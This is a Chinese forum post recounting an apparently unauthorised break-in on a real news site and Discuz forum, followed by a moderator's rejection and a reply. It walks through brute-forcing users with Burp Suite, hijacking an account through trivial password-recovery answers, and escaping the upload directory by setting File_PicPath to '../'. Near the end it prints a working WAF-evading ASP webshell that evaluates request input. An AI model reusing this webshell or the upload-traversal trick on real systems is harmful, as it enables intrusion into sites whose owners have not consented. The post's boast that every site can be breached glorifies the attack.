|
0x01 信息收集
服务器信息: windows 2003 + IIS 6.0 + aspx . Php + 安全狗 站点cms信息:一套aspx新闻发布系统 和 Discuz X3 端口信息 : 服务器好像有拦截了, 探测不了 暂时先不看了 找下突破点。 0x02 寻找突破点 先明确下思路, 主站 - DZ论坛弱口令 getshell - 旁站 - 社工 - C段嗅探 先从主站 找下突破点 , 发布新闻 肯定会有上传点的 习惯性的扫一下。 没扫出什么东西 懒得放 WVS appcan 去扫了,手工找下敏感信息吧。 有两处登陆的地方 后台弱口令 万能密码无果 去看一下会员中心 有个注册会员 好像是删除了,打不开 0x03 忘记密码找回突破
思路就快中断时候,灵光一闪 ,不是有个忘记密码么 注册不了 我们就来找回一个用户呗 说干就干 的确有admin 这个用户 试各种答案 都无果.. 又蛋疼了.. 先静下心想想思路..................................................... 会员中心 会员中心 不就是有很多会员的么 不止一个用户 肯定有别的用户 设置一些傻瓜化问题! 打开 Burpsuite 爆破几个用户名来试试。 成功爆破到一个 用户 试试他的问题吧,
还真是傻瓜化问题 , 答案 就是问题 。 得到一个随机密码 登录之~ 0x04 突破上传拿webshell
进到会员中心 发布新闻 找到这个上传点原本以为是Fckeditor 编辑器 可以秒杀 。 但是他用的不是原本的那个上传,这个上传点 什么东西都上传不了... 然后到处找啊找,, 还好找到一个可以上传的地方 附件上传 有上传就行~~上神器burp 截断试试。 本以为改成aspx 可以直接秒杀 ,, 但是404了.. 好吧 仔细看一下上传验证 -----------------------------7def81f240104 Content-Disposition: form-data; name="File_PicPath" news|0 -----------------------------7def81f240104 File_PicPath 参数 应该可以改 news 是新闻的意思吧 应该是上传到指定上传新闻图片附件的目录~ 我们把他改为 ../ 上一级目录试试。 的确是 打开试试 跳到上一级目录 秒杀之~ 开开心心上传一句话~~ 0x05 没遇到过的安全狗 上传菜刀本身的一句话,,没想到被安全狗拦截了 不过这个狗 第一次遇到。。 这种安全狗没遇到过... 不过找个中文一句话秒杀之~~ 附上中文一句话: <% i=(Chr(-12590)) love=(Chr(-20306)) you=(Chr(-15133)) OK=i&love&you CNM=Request(OK) eVal CNM 'pass:我爱你 %>
密码:我爱你 本次渗透到此结束了,提权没空去提, 学生党伤不起 思路要淫荡 头脑要明确 ! 总结一句话:不管你有什么拦截 只要你思路淫荡 没有你日不到的站。
========================= 手法缺乏亮点。故不予通过。 | 
你穿马都拦截了 怎么可能扫描不拦截?